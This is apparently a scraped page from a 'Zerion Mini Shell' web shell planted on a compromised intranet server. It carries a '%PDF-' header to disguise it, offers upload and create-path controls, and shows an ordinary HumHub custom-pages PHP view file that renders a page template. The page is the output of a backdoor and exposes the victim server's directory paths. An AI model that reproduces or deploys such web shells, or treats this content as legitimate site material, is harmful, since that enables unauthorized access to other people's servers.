%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/vacivi36/intranet.vacivitta.com.br/protected/modules/custom_pages/views/global/
Upload File :
Create Path :
Current File : /home/vacivi36/intranet.vacivitta.com.br/protected/modules/custom_pages/views/global/php.php

<?php

use yii\helpers\Html;
use yii\base\ViewNotFoundException;

/** @var $page \humhub\modules\custom_pages\models\Page */
/** @var $this \humhub\components\View */

$cssClass = ($page->hasAttribute('cssClass') && !empty($page->cssClass)) ? $page->cssClass : 'custom-pages-page';
?>



<div class="<?= Html::encode($cssClass) ?>">
    <?php try { ?>
        <?= $this->renderFile($page->getPhpViewFilePath()) ?>
    <?php } catch(ViewNotFoundException $vnfe) { ?>
        <?= Yii::t('CustomPagesModule.view_php', 'View not found') ?>
    <?php } ?>
</div>

Zerion Mini Shell 1.0